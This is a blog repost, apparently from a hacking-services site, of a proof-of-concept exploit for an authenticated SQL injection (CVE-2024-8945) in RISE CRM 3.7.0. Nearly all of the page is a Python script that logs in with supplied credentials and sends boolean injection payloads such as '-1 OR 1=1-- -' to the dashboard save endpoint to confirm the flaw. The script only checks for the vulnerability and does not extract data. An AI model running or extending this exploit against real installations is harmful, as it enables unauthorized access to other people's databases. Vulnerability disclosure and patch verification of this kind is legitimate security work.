Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86381318

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
# CVE: CVE-2024-8945
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################


import requests
import sys
from termcolor import colored

def login_and_capture_session(base_url, email, password):
    login_url = f"{base_url}/index.php/signin/authenticate"
    login_data = {"email": email, "password": password, "redirect": ""}
    login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
    session = requests.Session()
    response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
    if response.status_code == 200 and "dashboard" in response.url:
        print(colored("[*] Logged in successfully.", "green"))
        return session
    else:
        print(colored("[!] Login failed.", "red"))
        return None

def send_payload(session, target_url, payload):
    data = {
        "id": payload,
        "data": "false",
        "title": "PoC Test",
        "color": "#ff0000"
    }
    response = session.post(target_url, headers=session.headers, data=data, verify=False)
    return response

def verify_vulnerability(session, target_url):
    failed_payload = "-1 OR 1=2-- -"
    failed_response = send_payload(session, target_url, failed_payload)
    
    print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
    print(colored(f"{failed_response.text[:200]}", "cyan"))  
    
    successful_payload = "-1 OR 1=1-- -"
    successful_response = send_payload(session, target_url, successful_payload)
    
    if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
        print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
        print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
    
        print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
    else:
        print(colored("\nNot vulnerable!","red"))

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 script.py <base_url> <email> <password>")
        sys.exit(1)

    base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
    session = login_and_capture_session(base_url, email, password)
    if not session:
        sys.exit(1)

    session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
    target_url = f"{base_url}/index.php/dashboard/save"

    verify_vulnerability(session, target_url)